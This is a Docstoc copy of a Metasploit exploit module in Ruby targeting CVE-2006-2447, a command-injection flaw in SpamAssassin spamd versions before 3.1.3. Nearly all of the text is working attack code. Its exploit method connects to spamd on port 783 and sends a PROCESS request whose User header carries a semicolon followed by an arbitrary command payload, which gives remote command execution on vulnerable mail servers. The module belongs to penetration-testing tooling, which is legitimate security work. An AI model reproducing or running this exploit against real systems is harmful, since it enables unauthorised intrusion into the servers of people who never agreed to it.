Docstoc

SpamAssassin spamd 3.1.3 Command Injection

Document Sample
SpamAssassin spamd 3.1.3 Command Injection Powered By Docstoc
					                                SpamAssassin spamd 3.1.3 Command Injection                                           Page 1/2
   1    ##
   2    # $Id$
   3    ##
   4
   5    ##
   6    # This file is part of the Metasploit Framework and may be subject to
   7    # redistribution and commercial restrictions. Please see the Metasploit
   8    # Framework web site for more information on licensing and terms of use.
   9    # http://metasploit.com/framework/
   10   ##
   11
   12   require ’msf/core’
   13
   14
   15   class Metasploit3 < Msf::Exploit::Remote
   16
   17            include Msf::Exploit::Remote::Tcp
   18
   19            def initialize(info = {})
   20                    super(update_info(info,
   21                            ’Name’             => ’SpamAssassin spamd Remote Command Execution’,
   22                            ’Description’ => %q{
   23                                             This module exploits a flaw in the SpamAssassin spamd service by specifying
   24                                             a malicious vpopmail User header, when running with vpopmail and paranoid
   25                                             modes enabled (non−default). Versions prior to v3.1.3 are vulnerable
   26                            },
   27                            ’Author’         => [ ’patrick’ ],
   28                            ’License’       => MSF_LICENSE,
   29                            ’Version’       => ’$Revision$’,
   30                            ’References’   =>
   31                                       [
   32                                             [ ’CVE’, ’2006−2447’ ],
   33                                             [ ’OSVDB’, ’26177’ ],
   34                                             [ ’BID’, ’18290’ ],
   35                                             [ ’URL’, ’http://spamassassin.apache.org/advisories/cve−2006−2447.txt’ ],
   36                                       ],
   37                            ’Privileged’  => false,
   38                            ’Payload’       =>
   39                                       {
   40                                             ’DisableNops’ => true,
   41                                             ’Space’         => 1024,
   42                                             ’Compat’        =>
   43                                                       {
   44                                                                 ’PayloadType’ => ’cmd’,
   45                                                                 ’RequiredCmd’ => ’generic perl ruby bash telnet’,
   46                                                       }
   47                                       },
   48                            ’Platform’     => ’unix’,
   49                            ’Arch’            => ARCH_CMD,
   50                            ’Targets’       =>
   51                                       [
   52                                             [ ’Automatic’, { }],
patrick                                                                                                               06/06/2006
                                SpamAssassin spamd 3.1.3 Command Injection        Page 2/2
   53                                      ],
   54                           ’DisclosureDate’ => ’Jun 06 2006’,
   55                           ’DefaultTarget’ => 0))
   56
   57                           register_options(
   58                           [
   59                                   Opt::RPORT(783)
   60                           ], self.class)
   61         end
   62
   63         def exploit
   64                 connect
   65
   66                 content = Rex::Text.rand_text_alpha(20)
   67
   68                 sploit   = "PROCESS SPAMC/1.2\r\n"
   69                 sploit   << "Content−length: #{(content.length + 2)}\r\n"
   70                 sploit   << "User: ;#{payload.encoded}\r\n\r\n"
   71                 sploit   << content + "\r\n\r\n"
   72
   73                 sock.put(sploit)
   74
   75                 handler
   76                 disconnect
   77         end
   78
   79   end




patrick                                                                           06/06/2006

				
DOCUMENT INFO